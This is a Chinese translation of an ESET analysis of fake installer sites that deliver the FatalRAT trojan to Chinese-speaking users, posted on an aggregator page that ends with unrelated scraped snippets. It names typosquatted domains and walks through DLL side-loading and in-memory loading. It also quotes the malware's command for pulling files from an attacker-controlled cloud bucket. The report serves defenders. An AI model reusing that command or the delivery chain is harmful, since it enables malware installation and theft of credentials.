范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文
国学影视

警惕针对中文用户的虚假安装程序正在盛行

  翻译自:https://www.welivesecurity.com/2023/02/16/these-arent-apps-youre-looking-for-fake-installers/
  近日,ESET的安全研究人员发现了一种针对东南亚和东亚华裔人群的恶意软件活动。攻击者通过在Google搜索结果中购买误导性广告,诱骗受害者下载安装木马安装程序。未知的攻击者创建了虚假网站,看起来类似于火狐浏览器、WhatsApp或Telegram等流行应用程序的网站,但除了提供合法软件外,他们还提供了一种远程访问木马FatalRAT,使攻击者能够控制受害的计算机设备。 关键发现攻击者购买广告,将他们的恶意网站定位在谷歌搜索结果的"赞助"部分。在ESET向谷歌报告此问题后,谷歌已将这些恶意广告移除。 这些网站大多数使用的是中文并且提供软件的中文版本,这表明攻击者主要针对的是华语人群。 调查数据显示,受害者大多在东南亚和东亚,这表明广告针对的是该地区。 ESET在2022年8月至2023年1月期间观察到这些攻击,但根据其遥测数据显示,至少从2022年5月开始这些虚假安装程序就已经开始运行。 在这次攻击中使用的恶意软件或网络基础设施都没有与任何已命名组织的已知活动相匹配,因此目前ESET还没有将此活动归因于任何已知组织。 受害者研究
  根据ESET提供的攻击热图显示,2022年8月至2023年1月期间,大多数攻击影响了中国大陆及香港和台湾地区。其他少数受害群体依次来自马来西亚、日本、菲律宾、泰国、新加坡、印度尼西亚和缅甸。
  【图1:2022年8月至2023年1月期间,ESET检测到的受害者地理分布】 攻击概况
  图2展示了攻击的简单概况。由多个组件组成的链条最终会安装AT&T研究人员于2021年8月发现的FatalRAT恶意软件。据悉,这是一种远程访问木马,允许攻击者获取受害者计算机设备的控制权,包括执行任意shell命令、下载运行文件、从网络浏览器窃取数据以及捕获键入信息等。
  【图2:攻击的简单概况】 虚假网站
  攻击者注册了各种域名,这些域名都指向同一个IP地址:一个服务器托管多个下载木马软件的网站。其中一些网站看起来与合法网站一模一样,但却提供恶意安装程序。其他可能由攻击者翻译的网站则提供了中国人无法使用的软件的中文版本,如Telegram,详见图3。
  【图3:传递 FatalRAT恶意软件的虚假Telegram网站】
  ESET观察了这些应用程序的恶意网站和安装程序,按受欢迎程度排序大致为: Chrome; Firefox; Telegram; WhatsApp; Line; Signal; Skype; Electrum比特币钱包; 搜狗拼音输入法; 有道词典; WPS Office。
  更多其他虚假网站详见图4。结果显示,除了Electrum比特币钱包网站外,其他网站都是中文网站,这表明攻击者主要针对华语群体。
  【图4:攻击者为提供恶意安装程序而创建的虚假网站】
  从理论上讲,潜在的受害者有很多可能的途径被引导到这些虚假网站,一家新闻网站报道称,当他们在谷歌中搜索Firefox浏览器时,会看到一则广告,引导他们进入这些恶意网站之一。我们无法重现这样的搜索结果,但相信这些广告只提供给了目标地区的用户。
  据悉,在ESET向谷歌报告此问题后,谷歌已将这些恶意广告移除。
  【图5:Firefox的搜索结果中,有一个虚假网站的广告】
  鉴于攻击者为其网站注册的许多域名与合法域名非常相似,攻击者也有可能依靠拼写错误来吸引潜在的受害者访问他们的网站。一些例子包括: telegraem. org(假的)VS. telegram.org(合法的); electrumx. org(假的)VS. electrum.org(合法的); youedao. Com(假的)VS.youdao.com(合法的); 安装程序
  从虚假网站下载的安装程序并不是托管在与网站相同的服务器上,而是托管在阿里云对象存储服务(Alibaba Cloud Object Storage Service)中。它们是用高级安装程序创建的数字签名MSI文件。图6显示了攻击者在2023年1月6日上载到云存储的恶意安装程序。
  【图6:2023年1月6日,攻击者将恶意安装程序上传到云存储】
  当执行这些安装程序时,它们通常: 在%PROGRAMDATA%Progtmy目录下,删除并执行恶意加载程序,以及运行FatalRAT恶意软件所需的文件; 删除%PROGRAMDATA%Progtmy目录中的恶意更新程序和相关文件; 在%USERPROFILE%目录中放置一个名为ossutilconfig的文件。此文件包含更新程序用于连接到阿里云中的远程桶的凭据; 创建一个空目录%PROGRAMDATA%Progptp,不过我们观察到一些情况下FatalRAT恶意软件会被安装在这个目录中; 删除并执行C:Program FilesCommon Files中的合法安装程序; 创建计划任务以执行加载程序和更新程序组件;
  该恶意软件通过侧载(side-loading)恶意DLL libpng13.dll运行,该DLL被sccs.exe(浏览器支持模块)使用,sccs.exe是迅雷开发的合法可执行文件。原始libpng13.dll也包含在安装包中(重命名为一个随机名称),因为恶意DLL将其导出的函数转发到原始DLL。恶意DLL中转发的一些导出如图7所示。图像显示,在本例中,原始DLL被重命名为BHuedjhd.dll,恶意DLL被编译为Dll22.dll。
  【图7:在恶意DLL中被转发到原DLL的部分导出函数】
  恶意软件更新程序以类似的方式执行,通过侧载dr.dll,由腾讯开发的合法签名二进制文件使用。恶意DLL非常简单,并执行OSSUTIL(包含在安装包中的su.exe)从攻击者控制的阿里云桶中下载文件。DLL执行的命令是: cmd /C "C:ProgramDataProgtmy2ssu.exe cp -r oss://occ-a1/dll/3/ C:ProgramDataProgtmy –update"
  这应该从远程存储桶occ-a1(与用于存储安装程序的桶不同,但在同一个帐户中)更新%PROGRAMDATA%Progtmy本地目录中的文件,但是它在我们分析的任何安装程序中都不起作用,因为%PROGRAMDATA%Progtmy2子目录不存在(它应该是由安装程序创建的子目录0)。
  攻击者在为更新程序创建的计划任务上犯了同样的错误,因为执行路径也引用了不存在的子目录2。在大多数情况下,会创建四个计划任务:两个用于RAT(一组定期执行,另一组在任何用户登录到PC时执行),两个用于更新程序。任务的名称基于Windows构建号和计算机名称,如图8所示。
  【图8:由恶意安装程序创建的计划任务】 加载程序
  加载程序libpng13.dll是一个非常简单的组件,它在内存中打开并执行一个名为Micr.jpg的文件,该文件位于和DLL相同的目录中。攻击者通过多次调用只打印一些硬编码值的函数来混淆加载程序。使用此行为可能是为了避免被安全解决方案检测到,或使DLL的分析复杂化。
  【图9:左边显示了混淆的代码,右边显示了去混淆的代码】
  Micr.jpg实际上是包含嵌入式DLL的shellcode。该shellcode的目的是通过调用名为SignalChromeElf的DLL的导出函数来加载并在内存中执行嵌入式DLL。在执行这个导出函数之前,shellcode重构DLL的导入表并调用DllEntryPoint,它简单地调用Windows API函数DisableThreadLibraryCalls来增加DLL的隐蔽性。
  SignalChromeElf本质上将解密、加载并执行嵌入DLL中的加密有效载荷。这个加密的有效载荷是FatalRAT恶意软件,在它解密后,DLL将找到一个名为SVP7的导出函数的地址,其中包含恶意软件的入口点,并调用它,将FatalRAT的加密配置作为参数传递。
  嵌入式DLL中解密有效负载的函数与FatalRAT中用于解密其配置的函数相同。图10显示了该函数的一个示例。 FatalRAT
  FatalRAT是一种远程访问木马,由AT&T Alien Labs于2021年8月记录。这种恶意软件提供了一组功能,在受害者的计算机上执行各种恶意活动。例如,该恶意软件可以: 捕获按键信息; 改变受害者的屏幕分辨率; 终止浏览器进程并窃取或删除其存储的数据,目标浏览器是:Chrome、火狐、QQ以及搜狗; 下载并执行一个文件; 执行shell命令;
  该恶意软件包含各种检查,以确定它是否在虚拟环境中运行。根据其配置,这些检查可能被执行,也可能不被执行。
  根据ESET的分析结果可以确定这次活动中使用的FatalRAT版本与AT&T在其博文中记录的版本非常相似,所以这里不会赘述更多细节。图11显示了它们之间的比较,图10显示了用于解密来自该活动的FatalRAT样本中的字符串的反编译代码,这与AT&T所描述的相同。
  【图10:FatalRAT样本用于解密其配置字符串的函数的反编译代码】
  【图11:AT&T分析的FatalRAT样本与该活动中发现的FatalRAT样本之间的BinDiff比较】 先前版本
  ESET研究人员还发现了攻击者至少从2022年5月就开始使用的恶意安装程序的先前版本。与上述安装程序不同,这个版本包含一个xor加密的有效负载,分为三个文件:Micr. Flv、Micr2. flv以及Micr3. flv。每个文件都用不同的单字节XOR密钥加密。一旦解密,这三个文件的内容将被连接起来,形成与C&C服务器联系以下载和执行进一步shellcode的shellcode。
  在这种情况下,加载程序DLL被命名为dr.dll——与安装程序的后续版本中用于更新机制的名称相同,由相同的合法可执行文件侧加载。鉴于这个旧版本似乎没有更新程序,研究人员认为攻击者自2022年8月以来已经用新版本的安装程序取代了它。 结语
  攻击者花费了很大精力,试图将其网站使用的域名尽可能地与官方名称相似。在大多数情况下,虚假网站甚至是合法网站的相同副本。至于木马安装程序,它们会安装用户感兴趣的实际应用程序,从而尽可能地避免被怀疑。由于所有这些原因,我们看到在下载软件之前仔细检查我们访问的URL是多么重要。更好的做法是,在检查它是否是实际的供应商站点后,再将它输入到浏览器的地址栏中。
  由于这次活动使用的恶意软件FatalRAT包含了用于操纵来自不同浏览器数据的各种命令,而且受害者并不是针对特定类型的用户,因此任何人都可能受到影响。攻击者可能只对窃取网络证书等信息感兴趣,并在地下论坛上出售它们,或将它们用于另一种类型的犯罪软件活动,但目前还不可能将这种活动具体归因于已知或新的威胁行为者。

胸小的女生,哺乳期的时候,孩子是不是吃不饱?胸的大小不等于哺乳能力。乳汁分泌的频率是和排出的乳汁量相匹配的,也就是说,妈妈的乳汁的量是由婴儿来调节的。如果在生宝宝的三天内没有以某种形式将乳汁吸出乳房,乳汁的成分变化便不会出现为什么现在的女孩子那么迷恋肖战?相反,很多低龄小女孩不迷肖战,因为她们处在青春个性叛逆时期,比较喜欢酷盖类型,欣赏不了谈吐举止儒雅清正的人,数字事件中被蛊惑下场网暴他的就大部分是小女孩。肖战长成了女人最佳男友的样为什么电影里拆炸弹都是红线蓝线选一根?电影是虚构的嘛。现实中是不会有那种事情的。我曾经介绍过排爆和炸弹。首先来讲,排爆,永远不会以拆弹为第一选项。为什么?这与炸弹有关。炸弹可以做成无法拆弹的结构。炸弹爆炸,靠的是信号。随着全国省市实行限电措施,今年十一国庆节高速路上会拥堵吗?今年十一国庆节高速路上应该不会堵!原因如下其一全国已经有10多个省市开始限电,像有些地方的工厂甚至上二休五,短时间内应该不会改变这种格局,既然休息的时间多了,谁有愿意挤破头蹭这国庆艾滋病人死后该怎么处理?我们知道,一些传染病患者死后的尸体是需要特殊处理的,如历史上曾经流行过的霍乱鼠疫黑死病等,近一点的如非典禽流感等患者死后尸体是不能随意埋葬的,更不能随意运入火化场。烈性传染病患者死从全球第二到跌出前五,缺芯持续已久,华为还能夺回手机市场吗?华为损失未伤根,只待芯片功夫深。国家支持民众爱,夺回市场一二春。以前用平果后来改用华为P20,现在用m305G。但现在外面很少有5G信号。本人坚持用华为,华为总有一天夺回手机市场。以前小米手机那么火,现在怎么样了?别老让我回答有关这品牌的内容,行不?好讨厌!!!现在依然很火啊,而且长期活跃在行业前几,从做手机到现在也不过十年而已。IDC发布2020年Q1中国市场智能手机出货量排行榜华为284中通快递乡镇转让费15万,每天派件6百到7百左右,值得接手吗?中通快递转让费15万,每天派件6百到7百左右,值得接手吗?我们来算一笔账就知道了一年一度的双十一马上就要到了,有些人看着很多快递公司转让,想着去接手一家这样的快递公司,希望能赶上这物流公司的扫描员工作怎样?待遇如何?我是凌凌,职场领域创作者,以下为我的回答,感谢您的阅读感谢邀请,物流公司扫描员工个人认为时候年纪大,而且学历不高的人,原因如下1工作内容物流公司的扫描员的工作内容就是将分好的件(包如果滴滴退出市场,滴滴司机从业者影响大吗?作为一个网约车司机,我觉得没有任何影响不会,会有新的入行代替滴滴司机一点都不受影响。去开岀租车就好了。在说了开出租车比开网约车有尊严。没滴滴之前大家也没闲着,没滴滴还有其他网约车平昔日乒乓球世界冠军同时也是李晓霞恩师的乔云萍近况如何?谢谢邀请开球网作答简单评价,乔云萍是一位神人!当运动员的时候,乔姐就是全国冠军世界冠军,唯一的遗憾就是亚特兰大奥运会女子双打2013被乔红邓亚萍扳回。但要仔细看看乔云萍退役之后的事
山临界幸存者国产新游集合恐怖悬疑克苏鲁多元素的视觉小说Hello大家晚上好!给大家带来新一期由风域工作室开发的一款山临界幸存者,这款游戏国产视觉小说也是贵工作室的开山之作。故事剧本涵盖克苏鲁悬疑迷信等多元素,如今已经登陆steam平台英雄联盟手游版本新英雄莎弥拉赛恩强势推荐据游戏平台8月21日报道,英雄联盟手游本周更新了3。3B版本,对游戏的诸多方面进行了常规的平衡调整。在3。3B版本中,新英雄沙米拉和塞恩将于8月26日上午10点正式上线。其中,周欣DK老板被韩国人坑了,股份被偷偷卖掉,追不回属于自己的权益了?相信大家都知道DK战队中国老板最近的爆料,看了这件事之后很多人都给他抱不平,之前在S10世界赛冠军DWG夺冠之后,不少人也爆料出来了他们战队的条件有多差。在训练期间没有好的住宿条件长期头晕头痛是怎么回事?长期头晕头疼折磨人,尤其是上班族家庭妇女,平时有很繁重的工作,奈何头疼缠身无法脱身,通常情况下,我们怀疑自己头疼头晕的原因,可能是遗传因素贫血等。如果长时间的头晕头痛,我们要关注以晨读丨8月28日,关注健康每一天中医养生秋天吃莲子试试这两种做法夏天赏荷花,秋天吃莲子。中医认为,莲子具有补益脾胃养心安神消除疲劳等多种功效。莲子的做法很多,可煮粥炖汤羹,也可打粉泡饮或入面做主食,怎么吃都很养人体质热的人能不能艾灸?上热下寒怎么办?进来看看你就知道了艾灸具有双向调节功能,经过经络的传导,来调整身体的寒热虚实。热症施灸。黄帝内经说因其势而解之散之升之扬之,如开起窗,如揭起被,皆谓之发,艾火施灸可以使血管扩张,血流加速,腠理宣通,早上起床,早知早收益早上起床后,第一件事不是排便,也不是喝水,早知道早受益!一般早上起床在床上时就要分为4个小步骤,这样才比较的科学,不影响身体首先床上静坐5分钟因为我们清晨刚醒来,此时大脑还没有缓过二次换帅,广州城官宣李玮锋上任,出战世界杯和奥运会第一人8月29日晚间,中超球队广州城(原广州富力)发布了一则公告聘请李玮锋出任球队一线队主教练,原代理主教练肇俊哲改任俱乐部技术总监一职。就这样,广州两支球队都在短时间之内完成了换帅工作人海战术失效!8胜9负胜率首次跌破五成,夺冠效应负面影响凸显?北京时间8月29号,2223赛季北爱尔兰公开赛资格赛已经全部结束,此役中国军团没能延续前三战的良好状态,17场比赛仅有8人顺利晋级正赛,新赛季首次出现资格赛胜率不到五成的情况,开赛吴梦洁爆发,前冲式的扣球有男队员的风采看了亚洲杯中国对泰国的比赛,被吴梦洁的扣球惊艳到了,虽然小吴看上去身体单薄,但杀伤力极强。吴梦洁的前冲式扣球有男队员的风采,从弹跳到腰部力量,得到了充分的施展,随着年龄的增长力量加杜锋赌对了!用他换胡明轩乃明智之举,助攻周琦飞身暴扣看呆球迷北京时间8月29日,中国男篮与巴林男篮的世预赛,正在如火如荼的进行当中,上半场比赛,中国男篮依靠朱俊龙周琦等人的出色发挥,以42比33,暂时领先巴林队9分。从整个上半场比赛的情况来